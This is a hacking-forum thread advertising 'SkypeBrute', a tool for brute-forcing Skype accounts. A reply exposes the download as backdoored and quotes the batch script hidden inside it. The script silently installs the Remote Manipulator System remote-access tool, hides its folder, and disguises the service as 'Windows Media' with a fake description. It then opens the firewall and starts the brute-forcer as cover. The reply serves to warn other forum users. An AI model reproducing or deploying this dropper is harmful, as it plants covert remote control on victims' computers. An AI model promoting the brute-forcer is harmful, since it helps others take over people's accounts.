• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

SkypeBrute

Status
Not open for further replies.

Yioda

Banned
User
Joined
Jan 7, 2013
Messages
1
Reputation
0
Reaction score
1
Points
3
Credits
0
‎12 Years of Service‎
20%
Please note, if you want to make a deal with this user, that it is blocked.
image.png


This software is designed to bruteforce Skype.

Built-checker to the account.

Supports the HTTP proxy.

Software website: Fenks

backdoored

 
Re: SkypeBrute

original file by fenks

7b4b1887.jpg


your downlod

e2c0ccfe.jpg


extract files ;)

8e1a5186.jpg


Code:
>@echo off
@if not exist %SYSTEMROOT%\System32\sysfiles\rutserv.exe (goto inst) else (goto exit)

:inst
@taskkill /f /im rutserv.exe
@reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
@MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress
@MsiExec /x {A5DB67DC-DB0E-4491-B9F7-F258A02EE03C} /qn REBOOT=ReallySuppress
@msiexec /x {5B1EC627-A9CA-4BE8-966E-5FCB90ECD770} /qn REBOOT=ReallySuppress 
@msiexec /x {54D1AB84-6B0B-445D-B7AB-E2B2FEEC3A4F} /qn REBOOT=ReallySuppress
@msiexec /x {AB7AA605-500F-4153-8207-FB5563419112} /qn REBOOT=ReallySuppress
@MsiExec /x {B04BFE4C-7F11-49D8-ADFE-867939D886FA} /qn REBOOT=ReallySuppress
@MsiExec /x {2B0A2EED-E2C8-40CE-A701-95B211A39B34} /qn REBOOT=ReallySuppress

@ping 127.0.0.1
@MsiExec /I "rms.msi" /qn
@attrib +s +h "%SYSTEMROOT%\System32\sysfiles"
@ping 127.0.0.1
@sc config "RManService" start= auto displayname= "Windows Media"
@sc description "RManService" "Authorization and authentication for signed Windows Media files"
@goto end

:exit
@"%SYSTEMROOT%\System32\sysfiles\rutserv.exe" /silentinstall
@"%SYSTEMROOT%\System32\sysfiles\rutserv.exe" /firewall
@"%SYSTEMROOT%\System32\sysfiles\rutserv.exe" /start
@ping 127.0.0.1
@sc config "RManService" start= auto displayname= "Windows Media"
@sc description "RManService" "Authorization and authentication for signed Windows Media files"
start rms.msi
start SkypeBrute.exe
:end
 
Status
Not open for further replies.
Back
Top